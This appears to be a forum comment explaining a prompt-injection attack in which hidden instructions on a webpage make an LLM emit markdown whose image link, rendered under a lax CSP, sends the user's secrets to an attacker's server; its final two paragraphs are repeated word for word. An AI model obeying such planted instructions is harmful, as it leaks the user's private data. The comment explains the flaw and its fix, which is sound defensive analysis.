No, this model does not take any actions, it just produces a markdown output which is rendered by the browser. It can only read webpages explicitly provided by the user. In this case there are hidden instructions in that webpage, but these instructions can only affect the markdown output.
The problem is that by using a fully featured markdown with a lax CSP, this output can actually have side effects: in this case, when rendering in the users browser it makes a request to an attacker controlled image host with secrets in the parameters.
If the LLM output was shown as plaintext, or external links were not trusted, there would be no attack.
The problem is that by using a fully featured markdown with a lax CSP, this output can actually have side effects: in this case, when rendering in the users browser it makes a request to an attacker controlled image host with secrets in the parameters.
If the LLM output was shown as plaintext, or external links were not trusted, there would be no attack.